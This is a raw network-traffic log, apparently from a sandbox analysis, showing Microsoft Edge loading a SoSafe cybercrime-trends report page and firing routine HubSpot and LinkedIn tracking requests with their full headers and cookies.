/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748251&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/gif
content-length: 45
cf-ray: 85d1f5de4d337717-LHR
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 14
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-68f68ffdf9-gzdtb
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 7fd6e31e-a1ed-4afc-9668-99e179cbfc6c
x-request-id: 7fd6e31e-a1ed-4afc-9668-99e179cbfc6c
x-robots-tag: none
set-cookie: __cf_bm=Wcw8RG43zCBfdPnuUZROdkUMqDmZXKAebIfoAwDbIcw-1709220751-1.0-AXa++aVXMv/uWpyCNLqDGDf/VZOvbhRD7aDKYq6mV+/pO5/nTT/7uyBtoX/oZxz7avSO2NYCgwQJtMkJErVlWjA=; path=/; expires=Thu, 29-Feb-24 16:02:31 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dpmGyO2nY7uS%2FqlXd9XJkF4Kq3ZfSvidx%2BRQ%2FsGxvAm%2FGFqMzw%2FKbKA%2BaZb8GqNiNZjFDf34GE01Ab%2ByocY9axJPPzxGCJw9ubm3DiSJ6EjXcUmp%2BvSNAnC79V1brOeLtr9H"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=g5sYecvOuYE.8anId4iDzt4rnPnAPWJH8Obkwb_t6gs-1709220751202-0.0-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
-
GEThttps://track.hubspot.com/__ptq.gif?k=15&fi=3e5bc83a-1db9-4cbc-a714-816d21b3786f&fci=ba6b3dd5-6c11-4eb8-8877-1c29f484a5cb&ft=0&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748252&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0msedge.exeRemote address:104.19.154.83:443RequestGET /__ptq.gif?k=15&fi=3e5bc83a-1db9-4cbc-a714-816d21b3786f&fci=ba6b3dd5-6c11-4eb8-8877-1c29f484a5cb&ft=0&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748252&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/gif
content-length: 45
cf-ray: 85d1f5de4d2f7717-LHR
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 16
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-68f68ffdf9-scd75
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 7c5b1224-c06c-4aac-9c6e-994382e16fe7
x-request-id: 7c5b1224-c06c-4aac-9c6e-994382e16fe7
x-robots-tag: none
set-cookie: __cf_bm=tCOcKpNeRLNNzAJ5K2ovBDAmLM1o.DFnLOFHwPWHvTQ-1709220751-1.0-ASl2k7tdNlQ8TKjsdF2zFCgeAJtxnURqulejrK66Xb6EeSrB8c2rGYBwuSYe4D6M381juxNugqM1GZ6JtXZihDQ=; path=/; expires=Thu, 29-Feb-24 16:02:31 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ONrnl0qrdJL%2Bp1O7p%2FZgMKG1rBVnYe%2B3ZYFH2tEvzMF1j5nS%2Bei2Uc5rSjuEoz8CXPqH9g9nNyWPxJNUouNbbcyGnFpC%2BNDv92Aaer9R00fOOiKkypKAhFSEdYXb1E%2BYdozM"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=A3PSSPWo3w2mJE_PTkfhjpoVkljyGmNGE4pzAq89nQ8-1709220751208-0.0-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
-
GEThttps://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748254&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0msedge.exeRemote address:104.19.154.83:443RequestGET /__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748254&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/gif
content-length: 45
cf-ray: 85d1f5de4d347717-LHR
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 14
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-68f68ffdf9-762z9
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 93ca36b2-f292-4104-a433-5ce430f19665
x-request-id: 93ca36b2-f292-4104-a433-5ce430f19665
x-robots-tag: none
set-cookie: __cf_bm=7NXz21k.bHji.gbg7Npc6trYs76vdd1U_Slu7xvhCLI-1709220751-1.0-AZ6ChKJmtQJCTSstp6bGkXeIEk5/Zx5ptBNyFNYDfsCT1DiuowrFFGVV5VWXlQR90qqi8YrmKuWeBD4P9gEWk6I=; path=/; expires=Thu, 29-Feb-24 16:02:31 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t2KTOq1O%2FEvv7hTalA9yrEwp46%2BqCnHzIh3Lk7oaQlBydG5oXHdyGKt4%2FUQS5drBh0n49EPjtqDJgCz50nRK0UB9rLQuSiMayra2YE05TM111HsrvJ6VzYbjfl8woMFQC%2FYh"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=svqXYDem13pn1agbXPP4.DmtMch0tu6lPLIsSUm1ULc-1709220751214-0.0-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
-
Remote address:8.8.8.8:53Requestjs.hs-banner.comIN AResponsejs.hs-banner.comIN A172.64.153.27js.hs-banner.comIN A104.18.34.229
-
Remote address:172.64.153.27:443RequestGET /8858700.js HTTP/2.0
host: js.hs-banner.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=UTF-8
x-amz-id-2: e1kYJPWxDMFv0/Ierig2EiSVg/lcS9B8PwY2d21DvZsNx26UyKtdBpg0czpYTECXbRXgqmSsr/gpMDQYEoXf8UlVlbELJe0Q
x-amz-request-id: D5M5Y5S3H17WTM3G
last-modified: Tue, 27 Feb 2024 13:42:16 GMT
etag: W/"f87ed8e1a0d0ed5c42a5fbec46f55645"
x-amz-server-side-encryption: AES256
cache-control: max-age=300,public
x-amz-version-id: dUjohNE9BwQW0povY5V84ueFr4TfdKI1
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin, Accept-Encoding
expires: Thu, 29 Feb 2024 15:37:31 GMT
x-envoy-upstream-service-time: 29
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/analytics-js-proxy-td/envoy-proxy-8555f56d-pbs6d
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-hubspot-correlation-id: 8797307e-576c-4e11-97ac-aa8f55cedbe9
x-request-id: 8797307e-576c-4e11-97ac-aa8f55cedbe9
cf-cache-status: REVALIDATED
server: cloudflare
cf-ray: 85d1f5dfc88e412e-LHR
content-encoding: br
-
Remote address:8.8.8.8:53Requestpx.ads.linkedin.comIN AResponsepx.ads.linkedin.comIN CNAMEexp1.www.linkedin.comexp1.www.linkedin.comIN CNAMEwww-linkedin-com.l-0005.l-msedge.netwww-linkedin-com.l-0005.l-msedge.netIN CNAMEl-0005.l-msedge.netl-0005.l-msedge.netIN A13.107.42.14
-
Remote address:13.107.42.14:443RequestPOST /wa/ HTTP/2.0
host: px.ads.linkedin.com
content-length: 750
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: *
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 302
set-cookie: li_sugr=70da6a70-db4e-44d2-acd9-13ab51820208; Max-Age=7776000; Expires=Wed, 29 May 2024 15:32:31 GMT; SameSite=None; Path=/; Domain=.linkedin.com; Secure
set-cookie: bcookie="v=2&dc9265bb-596a-4485-8b4c-b82ba7e71244"; domain=.linkedin.com; Path=/; Secure; Expires=Fri, 28-Feb-2025 15:32:31 GMT; SameSite=None
set-cookie: lidc="b=OGST02:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1709220751:t=1709307151:v=2:sig=AQFMGs2Vi2qI2p37fPQgWx-jAKnGGYIV"; Expires=Fri, 01 Mar 2024 15:32:31 GMT; domain=.linkedin.com; Path=/; SameSite=None; Secure
linkedin-action: 1
x-li-fabric: prod-lor1
x-li-pop: afd-prod-lor1-x
x-li-proto: http/2
x-li-uuid: AAYShve7zVr/+TxItCoMFg==
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: A375BE42F9544BE9B0EF6084FF1FBEA7 Ref B: LON04EDGE1114 Ref C: 2024-02-29T15:32:31Z
date: Thu, 29 Feb 2024 15:32:30 GMT
content-length: 0
-
GEThttps://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2msedge.exeRemote address:13.107.42.14:443RequestGET /collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2 HTTP/2.0
host: px.ads.linkedin.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 302
set-cookie: li_sugr=c935e99d-3c66-41ed-bf8c-a468daefc577; Max-Age=7776000; Expires=Wed, 29 May 2024 15:32:31 GMT; SameSite=None; Path=/; Domain=.linkedin.com; Secure
set-cookie: bcookie="v=2&ca8e2403-e776-403e-8f4b-960aecfaa2f4"; domain=.linkedin.com; Path=/; Secure; Expires=Fri, 28-Feb-2025 15:32:31 GMT; SameSite=None
set-cookie: lidc="b=OGST02:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1709220751:t=1709307151:v=2:sig=AQFMGs2Vi2qI2p37fPQgWx-jAKnGGYIV"; Expires=Fri, 01 Mar 2024 15:32:31 GMT; domain=.linkedin.com; Path=/; SameSite=None; Secure
linkedin-action: 1
x-li-fabric: prod-lor1
x-li-source-fabric: prod-lva1
x-li-pop: afd-prod-lva1-x
x-li-proto: http/2
x-li-uuid: AAYShve9yVxI9TJx3KXssw==
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: 7137BF61542842D3B7AA266DEA0319F7 Ref B: LON04EDGE1114 Ref C: 2024-02-29T15:32:31Z
date: Thu, 29 Feb 2024 15:32:30 GMT
content-length: 0
-
GEThttps://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748583&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2msedge.exeRemote address:13.107.42.14:443RequestGET /collect?v=2&fmt=js&pid=2911873&time=1709220748583&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2 HTTP/2.0
host: px.ads.linkedin.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2&cookiesTest=truemsedge.exeRemote address:13.107.42.14:443RequestGET /collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2&cookiesTest=true HTTP/2.0
host: px.ads.linkedin.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
